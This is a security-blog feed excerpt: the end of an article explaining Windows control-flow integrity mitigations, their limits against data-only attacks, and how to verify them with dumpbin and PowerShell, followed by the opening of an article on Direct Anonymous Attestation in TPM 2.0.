&lt;p&gt;The CFI bitmap, the prototype hash, the shadow stack, the IBT tracker, the PAC MAC: none of them are designed to detect data writes. They are designed to detect control-flow transfers to illegal targets. A DOP exploit never goes to an illegal target. It stays on the legitimate path and rearranges what the program computes along the way.&lt;/p&gt;

A code-reuse attack class identified by Hu, Shinde, Sendroiu, Chua, Saxena and Liang at IEEE S&amp;amp;P 2016. DOP chains short data-flow-stitching gadgets to compute arbitrary functions using only legitimate, in-CFG control flow. The exploits never violate the static control-flow graph. Every CFI variant -- CFG, XFG, IBT, SHSTK, PAC -- is structurally invisible to DOP because none of these mechanisms validate data writes; they only validate the targets of indirect transfers [@hu-2016-dop].

flowchart TD
    A[Memory-safety bug] --&amp;gt; B[Control-flow hijacking]
    A --&amp;gt; C[Data-only attack]
    B --&amp;gt; D[ROP - closed by SHSTK]
    B --&amp;gt; E[JOP - closed by CFG/IBT/XFG]
    B --&amp;gt; F[COOP - closed by XFG and PAC]
    C --&amp;gt; G[DOP - not closed by any CFI]
    C --&amp;gt; H[Use-after-free - not closed by CFI]
    C --&amp;gt; I[Arbitrary-write primitive - not closed by CFI]
&lt;p&gt;Even within the forward-edge attacks CFI does try to close, the precision is limited. The Burow, Carr, Nash, Larsen, Franz, Brunthaler and Payer survey at ACM Computing Surveys 2017 is the canonical reference on the precision dimension [@burow-2017-csur].&lt;/p&gt;
&lt;p&gt;CFG admits the count of address-taken functions per binary -- thousands, on any non-trivial DLL. XFG narrows the equivalence class to the count of functions sharing a prototype hash. WOOT 2024 measured the geometric mean of XFG equivalence classes on Windows 11 Insider Preview at 1.37: a typical XFG-protected call site is followed by roughly one or two prototype-matching candidates [@woot24-becker-pdf].&lt;/p&gt;
&lt;p&gt;PAC&apos;s equivalence class is the count of functions whose signed-with-key-B return addresses collide on the same MAC -- much smaller in practice, but still non-singleton. None of these mitigations achieve the single-target precision a fully type-aware fine-grained CFI would offer.&lt;/p&gt;
&lt;p&gt;JIT and dynamic code constitute their own carve-out. Any platform with runtime code generation must mark JIT-emitted code as valid CFI territory through some API -- on Windows, &lt;code&gt;SetProcessValidCallTargets&lt;/code&gt; is the surface, plus the &lt;code&gt;PAGE_TARGETS_INVALID&lt;/code&gt; page-protection flag for memory that has not yet been marked. The Theori MS16-119 Chakra JIT bypass remains the canonical demonstration that JIT carve-outs are a structural CFI weakness, not an implementation bug [@theori-chakra-jit].&lt;/p&gt;
&lt;p&gt;And then there is the structural ceiling. Matt Miller&apos;s BlueHat IL 2019 talk &lt;em&gt;Trends, challenges, and shifts in software vulnerability mitigation&lt;/em&gt; contains the empirical floor: roughly 70% of CVEs Microsoft issued each year between 2006 and 2018 were memory-safety bugs, and the share has been stable across a window that includes the introduction of &lt;code&gt;/GS&lt;/code&gt;, SafeSEH, DEP, ASLR, CFG, ACG, CIG, and CET [@matt-miller-bluehat-il-2019].&lt;/p&gt;
&lt;p&gt;The Becker et al. WOOT 2024 §1 statement corroborates from the academic side: &quot;Memory safety vulnerabilities make up two thirds of security issues in large code bases across the industry&quot; [@woot24-becker-pdf]. Note the careful framing: this is the &lt;em&gt;bug class&lt;/em&gt; statistic, not the &lt;em&gt;exploit class&lt;/em&gt;. CFI closes a &lt;em&gt;subclass&lt;/em&gt; of memory-corruption exploitation. The bigger box is still open.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; CFI closes the control-flow-hijacking subclass of memory-corruption exploitation. The 70% memory-safety statistic is the structural ceiling. The exits from that ceiling are not within the CFI design space. They are memory-safe languages (Rust closing the bug class at compile time) and capability hardware (CHERI and CHERIoT closing pointer integrity at the silicon). CFI is one layer in a multi-layer story.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The real answers, then, are not new CFI variants. They are memory-safe languages -- Rust adoption in the Windows kernel, in the .NET runtime, in the WinRT projection -- and capability hardware. Neither is a substitute for the CFI layer that exists today, but neither is a CFI primitive either. They live at a different floor of the stack.&lt;/p&gt;
&lt;p&gt;So where is the research moving?&lt;/p&gt;
&lt;h2&gt;9. Open Problems&lt;/h2&gt;
&lt;p&gt;The 2026-2030 research surface on Windows CFI has at least five named unknowns.&lt;/p&gt;
&lt;p&gt;The first is kernel CFG and kernel CET bypasses. McGarr&apos;s Black Hat USA 2025 deck &lt;em&gt;Out of Control&lt;/em&gt; names the area explicitly: kernel-mode CFG and kernel-mode CET surfaces have active bypass research, including PTE-manipulation attacks against the kCFG bitmap when HVCI is disabled, and the &lt;code&gt;nt!KscpCfgDispatchUserCallTargetEs[No]Smep&lt;/code&gt; dispatch function on the kernel side [@mcgarr-bhusa25-deck-primary].&lt;/p&gt;
&lt;p&gt;The Synacktiv SSTIC 2025 paper is the canonical reverse-engineering reference for the kernel-mode HSP implementation, and it walks the bypass surface a researcher would attack first [@synacktiv-sstic25].&lt;/p&gt;
&lt;p&gt;The second is the XFG deprecation story. What fills the COOP-shaped forward-edge gap on shipping Windows x86-64 now that XFG is deprioritised? The candidates are IBT (free if Windows turned it on, but coarse: every &lt;code&gt;ENDBR64&lt;/code&gt; is a legal target), an academic refinement like FineIBT (not deployed), or an unnamed type-aware MSVC successor that Microsoft has not publicly committed to. The honest answer is: nothing has XFG&apos;s fine-grained shape on Windows x86-64 in 2026. The COOP-shaped attack surface is open.&lt;/p&gt;
&lt;p&gt;The third is Memory Tagging Extension on Windows-on-ARM. No Snapdragon X Elite or X Plus stepping currently sold supports ARMv8.5-A MTE in hardware, and Windows has no documented MTE-tagged allocator. The Pixel 8 line shipped MTE on Android in 2023 [@google-project-zero-mte] [@wiki-pixel-8]; Apple Silicon shipped a different MTE-adjacent tagging scheme [@apple-platform-security]; Windows is the third major platform on ARM and has the smallest MTE story. Whether Windows-on-ARM gets MTE in the next Snapdragon generation, and whether Microsoft ships a tagged Windows kernel allocator if it does, is open future work.&lt;/p&gt;
&lt;p&gt;The fourth is CFI for managed runtimes. The .NET and WebAssembly host code-generation paths are the same carve-out Theori demonstrated in 2016 against Chakra. The .NET runtime in particular runs through &lt;code&gt;RyuJIT&lt;/code&gt; to emit native code that must be marked CFG-valid through &lt;code&gt;SetProcessValidCallTargets&lt;/code&gt; [@ms-learn-setprocessvalidcalltargets]. Whether Microsoft ships a finer-grained CFI for managed-runtime-emitted code -- one that bounds the equivalence class to &quot;methods of this type&quot; rather than &quot;any address-taken function in the process&quot; -- is not a public roadmap item.&lt;/p&gt;
&lt;p&gt;The fifth is forward-edge precision after XFG. The Burow et al. CSUR 2017 survey&apos;s analytical framing is the one to keep in mind: precision is the size of the equivalence class admitted at each call site. CFG admits thousands. XFG admits roughly one to two on the WOOT 2024 measurement. The fine-grained ideal is one. Microsoft has not publicly committed to a successor type-aware forward-edge CFI for Windows x86-64.&lt;/p&gt;
&lt;p&gt;Knowing what is open is half the practitioner&apos;s job. Knowing how to verify what is currently shipping is the other half.&lt;/p&gt;
&lt;h2&gt;10. Verifying CFI on Any Windows Binary&lt;/h2&gt;
&lt;p&gt;A reproducible workflow the reader can run on their own machine right now.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Compile with CFI.&lt;/strong&gt; The MSVC command line for the full stack is &lt;code&gt;cl /guard:cf main.cpp /link /DYNAMICBASE /HIGHENTROPYVA /CETCOMPAT&lt;/code&gt;. Order matters: switches before &lt;code&gt;/link&lt;/code&gt; go to the compiler, switches after &lt;code&gt;/link&lt;/code&gt; go to the linker, and &lt;code&gt;/CETCOMPAT&lt;/code&gt; is a linker-only option [@ms-learn-cetcompat]. Both &lt;code&gt;/guard:cf&lt;/code&gt; &lt;em&gt;and&lt;/em&gt; &lt;code&gt;/DYNAMICBASE&lt;/code&gt; are required for CFG; &lt;code&gt;/guard:cf&lt;/code&gt; alone is a silent no-op [@ms-learn-guard-flag].&lt;/p&gt;
&lt;p&gt;&lt;code&gt;/guard:xfg&lt;/code&gt; adds XFG instrumentation on MSVC since Visual Studio 2019 Preview 16.5 [@mcgarr-examining-xfg]. &lt;code&gt;/CETCOMPAT&lt;/code&gt; marks the binary as shadow-stack-compatible, which the loader uses to decide whether shadow-stack faults are fatal in strict mode. &lt;code&gt;/HIGHENTROPYVA&lt;/code&gt; extends ASLR&apos;s randomisation range and is required for the 128 TB user VA that CFG&apos;s bitmap reservation depends on [@ms-learn-highentropyva].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Inspect a binary on disk.&lt;/strong&gt; &lt;code&gt;dumpbin /loadconfig binary.exe&lt;/code&gt; reports &lt;code&gt;CF Instrumented&lt;/code&gt;, &lt;code&gt;FID table present&lt;/code&gt;, &lt;code&gt;Long jump target table&lt;/code&gt;, and &lt;code&gt;XFG functions present&lt;/code&gt;. &lt;code&gt;dumpbin /headers binary.exe&lt;/code&gt; reports &lt;code&gt;IMAGE_DLLCHARACTERISTICS_EX_CET_COMPAT&lt;/code&gt; if the binary was linked with &lt;code&gt;/CETCOMPAT&lt;/code&gt;. &lt;code&gt;link /DUMP /HEADERS&lt;/code&gt; is the linker-side equivalent and produces the same information. Both tools ship in any Visual Studio install.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Inspect a running process.&lt;/strong&gt; &lt;code&gt;Get-ProcessMitigation -Name notepad.exe&lt;/code&gt; in PowerShell reports CFG, ASLR, DEP, shadow-stack, &lt;a href=&quot;https://paragmali.com/blog/process-mitigation-policies-cfg-acg-cig-and-the-layer-betwee/&quot; rel=&quot;noopener&quot;&gt;ACG and CIG&lt;/a&gt; state per process [@ms-learn-cfg]. &lt;code&gt;Set-ProcessMitigation&lt;/code&gt; toggles policies at runtime for a given process name. &lt;code&gt;Get-ProcessMitigation -System&lt;/code&gt; reports system-wide defaults. The cmdlet is implemented atop &lt;code&gt;GetProcessMitigationPolicy&lt;/code&gt; under the hood.&lt;/p&gt;
&lt;p&gt;{`
// Reproduces the logic of Get-ProcessMitigation plus dumpbin output
// for a single binary. In real PowerShell, GetProcessMitigationPolicy
// returns a struct with one field per policy class.&lt;/p&gt;
&lt;p&gt;function inspectBinary(name, dumpbinHeaders, dumpbinLoadConfig) {
  const cetCompat = dumpbinHeaders.includes(&apos;CET Compatible&apos;);
  const cfInstrumented = dumpbinLoadConfig.includes(&apos;CF Instrumented&apos;);
  const xfgPresent = dumpbinLoadConfig.includes(&apos;XFG functions present&apos;);&lt;/p&gt;
&lt;p&gt;  console.log(&apos;--- &apos; + name + &apos; ---&apos;);
  console.log(&apos;  CFG       :&apos;, cfInstrumented ? &apos;INSTRUMENTED&apos; : &apos;absent&apos;);
  console.log(&apos;  XFG       :&apos;, xfgPresent ? &apos;INSTRUMENTED&apos; : &apos;absent&apos;);
  console.log(&apos;  CETCOMPAT :&apos;, cetCompat ? &apos;YES&apos; : &apos;NO&apos;);
}&lt;/p&gt;
&lt;p&gt;function inspectProcess(name, mitigationPolicy) {
  console.log(&apos;Process: &apos; + name);
  console.log(&apos;  CFG.Enable                 :&apos;, mitigationPolicy.CFG.Enable);
  console.log(&apos;  UserShadowStack.Enable     :&apos;, mitigationPolicy.USS.Enable);
  console.log(&apos;  UserShadowStack.StrictMode :&apos;, mitigationPolicy.USS.StrictMode);
  console.log(&apos;  ASLR.BottomUp              :&apos;, mitigationPolicy.ASLR.BottomUp);
  console.log(&apos;  DEP.Enable                 :&apos;, mitigationPolicy.DEP.Enable);
}&lt;/p&gt;
&lt;p&gt;inspectBinary(&apos;msedge.exe&apos;,
  &apos;IMAGE_DLLCHARACTERISTICS_EX_CET_COMPATIBLE&apos;,
  &apos;CF Instrumented, FID table present, XFG functions present&apos;);&lt;/p&gt;
&lt;p&gt;inspectProcess(&apos;msedge.exe&apos;, {
  CFG:  { Enable: &apos;ON&apos;, StrictMode: &apos;ON&apos; },
  USS:  { Enable: &apos;ON&apos;, StrictMode: &apos;ON&apos; },
  ASLR: { BottomUp: &apos;ON&apos; },
  DEP:  { Enable: &apos;ON&apos; }
});
`}&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Programmatic policy installation.&lt;/strong&gt; The two API surfaces are &lt;code&gt;SetProcessMitigationPolicy&lt;/code&gt;, which sets the policy of the current process at runtime, and &lt;code&gt;UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY)&lt;/code&gt;, which sets the policy of a child process at &lt;code&gt;CreateProcess&lt;/code&gt; time. The latter is the only race-free entry point for hardened child processes -- it is impossible for child code to execute before the policy is installed.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Use &lt;code&gt;UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY)&lt;/code&gt; paired with &lt;code&gt;CreateProcess&lt;/code&gt;, not in-process &lt;code&gt;SetProcessMitigationPolicy&lt;/code&gt; after the fact. The latter has a window between process creation and policy installation in which child code can execute without the mitigation. The &lt;code&gt;UpdateProcThreadAttribute&lt;/code&gt; approach installs the policy as part of the process creation &lt;code&gt;STARTUPINFOEX&lt;/code&gt;, closing the race.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;Turn on kernel-mode HSP.&lt;/strong&gt; Windows Security -&amp;gt; Device Security -&amp;gt; Core Isolation -&amp;gt; &quot;Kernel-mode Hardware-enforced Stack Protection.&quot; HVCI is the prerequisite; if it is off, the toggle is not available. Group Policy exposes the same setting at &lt;code&gt;Computer Configuration / Administrative Templates / System / Device Guard / Turn On Virtualization Based Security / Kernel-mode Hardware-enforced Stack Protection&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Open PowerShell as administrator and run:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-powershell&quot;&gt;Get-ProcessMitigation -Name (Get-Process -Id $PID).Path |
  Select-Object CFG, ASLR, DEP, UserShadowStack
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The output is the policy of the current PowerShell session. To check a binary on disk:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-powershell&quot;&gt;dumpbin /headers C:\Windows\System32\notepad.exe | findstr /C:&quot;CET&quot;
dumpbin /loadconfig C:\Windows\System32\notepad.exe | findstr /C:&quot;FID&quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The first line returns &lt;code&gt;CET Compatible&lt;/code&gt; if the binary was linked with &lt;code&gt;/CETCOMPAT&lt;/code&gt;. The second returns the FID-table presence line if CFG was enabled.&lt;/p&gt;
&lt;p&gt;Now the reader can answer the question §1 raised: why does the same OS apply different contracts to different processes? Because each process opts in, and the opt-in surface has ten bits.&lt;/p&gt;
&lt;h2&gt;11. Frequently Asked Questions&lt;/h2&gt;

No. None of them close the data-only attack class. Hu and colleagues proved at IEEE S&amp;amp;P 2016 that Data-Oriented Programming is Turing-complete and never violates the static control-flow graph, which means every CFI variant is structurally blind to it [@hu-2016-dop]. CFI closes the control-flow-hijacking subclass of memory-corruption exploitation. The 70% memory-safety statistic from Matt Miller&apos;s BlueHat IL 2019 talk is the structural ceiling [@matt-miller-bluehat-il-2019].

The public-facing reason is documented in Connor McGarr&apos;s Black Hat USA 2025 retrospective: &quot;XFG was never fully instrumented (UM/KM) and is now deprecated&quot; [@mcgarr-bhusa25-deck-primary]. The most defensible reading of why is that hardware CET on the backward edge -- territory software CFG and XFG never touched -- became the strategic priority once Tiger Lake silicon arrived in September 2020. WOOT 2024 measured XFG at 85.7% of x64 PE files on Insider Preview, never reaching the universal coverage CFG achieves [@woot24-becker-pdf].

No. The Microsoft Learn page states the default verbatim: &quot;Kernel-mode Hardware-enforced Stack Protection is off by default, but customers can turn it on if the prerequisites are met&quot; [@ms-learn-kernel-hsp]. The prerequisites are an 11th-gen Intel Core Mobile CPU or AMD Zen 3 or newer, Windows 11 2022 update or newer, VBS enabled, HVCI enabled, and an explicit user opt-in via Windows Security or Group Policy.

No, not as of May 2026. The Snapdragon X Elite and X Plus steppings shipping in 2026 Windows-on-ARM machines do not support ARMv8.5-A Memory Tagging Extension in hardware, and Windows has no documented MTE-tagged allocator. Pointer Authentication is shipped (92% PA file coverage on Insider Preview build 23419 per WOOT 2024) but MTE is not [@woot24-becker-pdf] [@mcgarr-windows-pac].

Yes. AMD Zen 3 (Ryzen 5000 &quot;Vermeer&quot; and Epyc 7003 &quot;Milan&quot;) shipped on November 5, 2020 with a compatible shadow-stack implementation [@wiki-zen-3]. Microsoft&apos;s Kernel-mode HSP documentation explicitly names &quot;AMD Zen 3 Core (and newer)&quot; as a CET prerequisite [@ms-learn-kernel-hsp]. The instruction encodings follow the Intel CET specification, so OS code paths are shared.

Different invariants, different timing. `/GS` is a stack-cookie check on function *epilogue*: a random value is placed between local buffers and the saved return address, and the runtime check fires before `ret` if the cookie has been overwritten. CFG is an indirect-call target check on function *prologue*: every indirect call site invokes a thunk that consults a bitmap to verify the target address. `/GS` detects contiguous stack-buffer overflows; CFG constrains the target of an attacker-controlled function-pointer write. They are complementary, not substitutes.

HVCI is W^X for kernel pages. The hypervisor enforces that kernel memory marked executable is not writable from any source, including the NT kernel itself, by managing the second-level address translation tables that the kernel cannot touch. Kernel-mode HSP is the CET-based ROP mitigation for ring 0: a CPU-managed shadow stack of kernel return addresses, with a `#CP` fault on mismatch. HVCI is a prerequisite for kernel-mode HSP because the shadow-stack pages need to be write-protected by the hypervisor; the NT kernel cannot guarantee its own non-mutability after a code-execution compromise [@ms-learn-kernel-hsp].

Rust closes memory-safety bugs at compile time. CFI closes the exploitation surface at runtime against bugs that did make it past the compiler. Both layers ship in parallel. Microsoft is migrating selected Windows kernel components to Rust (the Mu UEFI firmware project [@github-microsoft-mu], segments of the GDI subsystem) but CFI remains the runtime layer for everything in the C and C++ surface. The two are complementary; one does not replace the other.
&lt;p&gt;The story this article tells closes around a structural admission. CFI is one layer of a defence stack. The 1996-to-2016 attack-class genealogy -- stack smash, return-into-libc, ROP, JOP, COOP, DOP -- produced a matching defense genealogy on Windows: &lt;code&gt;/GS&lt;/code&gt;, DEP, ASLR, CFG, XFG, CET shadow stack. Each generation closes the gap the previous attacker class opened. Each leaves open exactly the territory the next attacker class will occupy.&lt;/p&gt;
&lt;p&gt;DOP and the 70% memory-safety statistic are the territory no CFI generation has touched. That territory is the one Rust closes at compile time, and CHERI and CHERIoT close at the silicon. The future of memory-corruption defence on Windows is not a fourth generation of CFI. It is the combination of memory-safe languages in the kernel and capability hardware underneath the language.&lt;/p&gt;
&lt;p&gt;CFI is necessary and not sufficient. Now you know which bit is which.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;control-flow-integrity-on-windows-cfg-xfg-and-intel-cet-shadow-stack&quot; keyTerms={[
  { term: &quot;CFG&quot;, definition: &quot;Control Flow Guard. Shipped Windows 8.1 Update 3 (November 2014). Per-process bitmap of valid indirect-call targets, indexed by target address.&quot; },
  { term: &quot;XFG&quot;, definition: &quot;eXtended Flow Guard. Announced BlueHat Shanghai 2019. 64-bit prototype-hash refinement of CFG; never fully instrumented in shipping Windows; deprecated per McGarr BHUSA 2025.&quot; },
  { term: &quot;CET&quot;, definition: &quot;Intel Control-flow Enforcement Technology. Hardware feature shipped in Tiger Lake (September 2, 2020). Two components: SHSTK (Shadow Stack) and IBT (Indirect Branch Tracking).&quot; },
  { term: &quot;SHSTK&quot;, definition: &quot;Shadow Stack. CPU-managed parallel stack of return addresses, write-protected by a CET page-table bit. Mismatch on ret raises #CP.&quot; },
  { term: &quot;IBT&quot;, definition: &quot;Indirect Branch Tracking. Forward-edge half of CET. Indirect-branch targets must begin with ENDBR64; mismatch raises #CP. Windows does not enable IBT as of 2026.&quot; },
  { term: &quot;FID table&quot;, definition: &quot;Function ID table. Per-binary PE structure inside IMAGE_LOAD_CONFIG_DIRECTORY listing every address-taken function. Loader merges per-module tables into a process-wide CFG bitmap.&quot; },
  { term: &quot;COOP&quot;, definition: &quot;Counterfeit Object-Oriented Programming. Schuster et al. IEEE S&amp;amp;P 2015. Chains C++ virtual calls dispatched through legitimate vtables, every target a valid CFG bit. The attack that motivated XFG.&quot; },
  { term: &quot;DOP&quot;, definition: &quot;Data-Oriented Programming. Hu et al. IEEE S&amp;amp;P 2016. Turing-complete attack via non-control data corruption. Invisible to every CFI variant because it never violates the control-flow graph.&quot; },
  { term: &quot;PAC&quot;, definition: &quot;Pointer Authentication Code. ARMv8.3-A feature. Cryptographic MAC over a 64-bit pointer in unused upper bits. Windows-on-ARM uses key B for instruction-pointer signing on return addresses.&quot; },
  { term: &quot;HVCI&quot;, definition: &quot;Hypervisor-enforced Code Integrity. W^X for kernel pages enforced by the hypervisor via second-level address translation. Prerequisite for kernel-mode HSP.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows-security</category><category>control-flow-integrity</category><category>cfg</category><category>xfg</category><category>intel-cet</category><category>shadow-stack</category><category>exploit-mitigation</category><category>rop</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Direct Anonymous Attestation: The Zero-Knowledge Proof Already in Every TPM</title><link>https://paragmali.com/blog/direct-anonymous-attestation-the-zero-knowledge-proof-alread/</link><guid isPermaLink="true">https://paragmali.com/blog/direct-anonymous-attestation-the-zero-knowledge-proof-alread/</guid><description>TPM 2.0 names a zero-knowledge group-signature primitive in its spec. A billion chips ship it. Almost nobody verifies it. The story of why DAA won every standardization fight and lost every deployment one.</description><pubDate>Tue, 12 May 2026 00:00:00 GMT</pubDate><content:encoded>
**Direct Anonymous Attestation is the zero-knowledge proof your laptop already has -- and never uses.** Every TPM 2.0 specification since 2014 names a group-signature primitive called `TPM_ALG_ECDAA`, with a normative command pair (`TPM2_Commit`, `TPM2_Sign`) and a mandatory curve (`TPM_ECC_BN_P256`). A TPM with ECDAA enabled can prove &quot;I am a genuine TPM whose endorsement key was certified by a known issuer&quot; without revealing *which* TPM and without an online third party in the verification path. ISO/IEC 20008-2:2013 Mechanism 4 standardizes it. FIDO Alliance bound it to authenticator attestation in 2018. WebAuthn Level 1 registered ECDAA as an attestation type carried inside the `packed` and `tpm` attestation statement formats in March 2019. Three years later, WebAuthn Level 2 removed it entirely. The TCG PC Client Platform TPM Profile made `TPM_ALG_ECDAA` optional in February 2020. Microsoft Azure Attestation, Windows Health Attestation, AWS Nitro, Apple App Attest, and Google Play Integrity all use Privacy-CA-shaped broker flows instead. This article walks the thirty-year cryptographic lineage, the TPM 2.0 normative surface, the FIDO ECDAA failure, and the structural reasons Microsoft chose brokers over math.
&lt;h2&gt;1. A Billion Chips, Zero Verifiers&lt;/h2&gt;
&lt;p&gt;Every TPM 2.0 Library Specification published since 2014 names a zero-knowledge proof of knowledge. The algorithm identifier &lt;code&gt;TPM_ALG_ECDAA&lt;/code&gt; (value &lt;code&gt;0x001A&lt;/code&gt;) appears in Part 2 (Structures). The command pair &lt;code&gt;TPM2_Commit&lt;/code&gt; and &lt;code&gt;TPM2_Sign&lt;/code&gt; appears in Part 3 (Commands). The mathematical construction appears in Part 1 Annex C.5. The mandatory curve is &lt;code&gt;TPM_ECC_BN_P256&lt;/code&gt; (&lt;code&gt;0x0010&lt;/code&gt;), a 256-bit Barreto-Naehrig curve picked specifically because it admits the asymmetric pairings the protocol needs [@tpm-library-spec]. A conforming &lt;a href=&quot;https://paragmali.com/blog/the-tpm-in-windows-one-primitive-twenty-five-years-and-the-c/&quot; rel=&quot;noopener&quot;&gt;TPM 2.0 chip&lt;/a&gt; with ECDAA enabled can produce a signature that proves the chip is a genuine TPM whose endorsement key was certified by a known issuer -- without revealing &lt;em&gt;which&lt;/em&gt; TPM, and without an online certificate authority sitting in the verification path. The cryptography is called Direct Anonymous Attestation, and the Wikipedia article notes that the construction is &quot;implemented by both EPID 2.0 and the TPM 2.0 standard&quot; [@wiki-daa].&lt;/p&gt;
&lt;p&gt;Almost nobody uses it.&lt;/p&gt;
&lt;p&gt;Microsoft Azure Attestation does not. Its public architecture document describes a certificate authority that ingests endorsement-key certificates and issues per-key JWTs with a special issuance policy [@azure-attestation]. The Windows Health Attestation Service does not. AWS Nitro Enclaves does not [@aws-nitro-attestation]. Apple App Attest does not [@apple-app-attest]. Google Play Integrity does not [@google-play-integrity]. WebAuthn Level 1 registered ECDAA as an attestation type carried inside the &lt;code&gt;packed&lt;/code&gt; and &lt;code&gt;tpm&lt;/code&gt; formats in March 2019; WebAuthn Level 2 in April 2021 removed it entirely [@webauthn-2]. The TCG PC Client Platform TPM Profile, the document that governs which TPM 2.0 algorithms an OEM must support to ship a Windows-class platform, made &lt;code&gt;TPM_ALG_ECDAA&lt;/code&gt; and &lt;code&gt;TPM_ALG_ECSCHNORR&lt;/code&gt; optional in v1.04 (February 2020) and has carried that designation through v1.07 RC1 (December 2025) [@tcg-ptp]. &lt;a href=&quot;https://paragmali.com/blog/pluton-a-tpm-on-silicon-microsoft-can-patch/&quot; rel=&quot;noopener&quot;&gt;Microsoft Pluton&lt;/a&gt;&apos;s published surface, which enumerates the algorithms the security processor exposes through its TPM 2.0 personality, does not advertise ECDAA at all [@pluton].&lt;/p&gt;
&lt;p&gt;The most thoroughly standardized hardware-anchored group-signature primitive in the history of platform security sits in firmware on a billion-plus machines and runs on almost none.&lt;/p&gt;
&lt;p&gt;Why?&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Direct Anonymous Attestation solves the same problem as a Privacy-CA -- prove the TPM is genuine without disclosing &lt;em&gt;which&lt;/em&gt; TPM -- by moving the trust assumption from operational (the broker promises not to log) to cryptographic (the math forbids the issuer from learning). The interesting question is not whether the cryptography works. It is why an industry that spent thirty years building the math chose, in production, the architecture the math was meant to replace.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This article walks the answer in four moves. Sections 2 through 5 reconstruct the cryptographic lineage: the Privacy-CA architecture DAA was invented against (TPM 1.1, 2003), the group-signature pre-history that made the construction possible (Chaum-van Heyst 1991 through Camenisch-Lysyanskaya 2004), the Brickell-Camenisch-Chen breakthrough at ACM CCS 2004, and the seven-year evolution to the elliptic-curve scheme TPM 2.0 actually ships (Chen-Page-Smart, CARDIS 2010). Sections 6 and 7 walk the normative surfaces: the TPM 2.0 ECDAA command surface and the ISO/IEC 20008-2 / 20009-2 standards. Sections 8 and 9 are case studies in non-deployment: FIDO&apos;s three-year experiment with ECDAA-in-WebAuthn, and Microsoft&apos;s two-decade commitment to broker-mediated attestation. Section 10 names the open problems -- post-quantum DAA, confidential computing, the One-TPM-to-Bind-Them-All fix that has not made it into TCG text. Section 11 closes with a role-keyed practical guide and an FAQ.&lt;/p&gt;

timeline
    title Direct Anonymous Attestation, 1991-2024
    1991 : Chaum-van Heyst (EUROCRYPT)
         : Group signature defined
    1997 : Camenisch-Stadler (CRYPTO)
         : Constant-size signatures
    2000 : ACJT (CRYPTO)
         : Coalition resistance
    2004 : Brickell-Camenisch-Chen (CCS)
         : Boneh-Boyen-Shacham short groupsigs
    2005 : DAA-RSA added to TPM 1.2 rev 94
    2007 : Brickell-Li EPID (WPES)
         : Signature-based revocation
    2008 : Brickell-Chen-Li (TRUST)
         : First pairing DAA
         : CMS asymmetric DAA proposed
    2010 : Chen-Li (IPL)
         : CMS proof flaw
         : Chen-Page-Smart (CARDIS)
         : The scheme TPM 2.0 ships
    2013 : BFGSW (IJIS)
         : User-controlled linkability model
         : ISO/IEC 20008-2 / 20009-2
    2014 : TPM 2.0 Library Spec
         : ECDAA in firmware
    2015 : Smyth-Ryan-Chen
         : Retroactive BCC privacy bug
    2018 : FIDO ECDAA v2.0
    2019 : WebAuthn Level 1
         : ecdaa attestation format
    2020 : TCG PTP v1.04
         : ECDAA made optional
    2021 : WebAuthn Level 2
         : ecdaa format removed
    2024 : CoSNIZK
         : Lattice DAA at 38 kB
&lt;p&gt;To answer the question of why, we have to start where every TPM attestation story does -- with the architecture DAA was invented to replace.&lt;/p&gt;
&lt;h2&gt;2. The Privacy-CA Trap (1999-2003)&lt;/h2&gt;
&lt;p&gt;TPM 1.1, originally published by the Trusted Computing Platform Alliance in 2002 and taken over in April 2003 by the Trusted Computing Group that replaced it [@wiki-tcg], had a privacy story. The story was a broker called the Privacy Certificate Authority. The story had a single load-bearing flaw, and the field spent the next two decades writing papers about it.&lt;/p&gt;
&lt;p&gt;The mechanism, paraphrased from the Wikipedia summary that itself paraphrases the TCG spec, is five steps [@wiki-daa]:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;A TPM manufacturer embeds a 2048-bit RSA Endorsement Key (EK) at the time the chip is provisioned, along with a certificate &lt;code&gt;EKCert&lt;/code&gt; signed by the manufacturer [@wiki-tpm].&lt;/li&gt;
&lt;li&gt;The platform generates a fresh Attestation Identity Key (AIK) inside the TPM.&lt;/li&gt;
&lt;li&gt;The platform sends &lt;code&gt;(EKCert, AIKpub, proof-of-binding)&lt;/code&gt; to a Privacy-CA.&lt;/li&gt;
&lt;li&gt;The Privacy-CA validates the EK certificate, confirms the binding proof, and issues &lt;code&gt;Cert(AIKpub)&lt;/code&gt; signed by the CA.&lt;/li&gt;
&lt;li&gt;The platform uses the AIK to sign actual attestations -- platform configuration register quotes, boot logs, key-attestation certificates -- and presents &lt;code&gt;Cert(AIKpub)&lt;/code&gt; to relying parties as proof that the AIK is TPM-resident.&lt;/li&gt;
&lt;/ol&gt;

The Endorsement Key is the long-lived, manufacturer-certified asymmetric key anchored in the TPM at manufacture (in TPM 2.0, derived from a persistent endorsement seed). Its public half is the chip&apos;s long-term cryptographic identity; its certificate, signed by the manufacturer, is the platform&apos;s proof that the chip is a real TPM. The Attestation Identity Key is a short-lived TPM-resident key generated for signing attestation outputs. Because the EK is uniquely identifying, the AIK exists to absorb attestation traffic on the EK&apos;s behalf: the EK certifies the AIK once (or once per Privacy-CA), and the AIK does the signing thereafter [@azure-attestation].

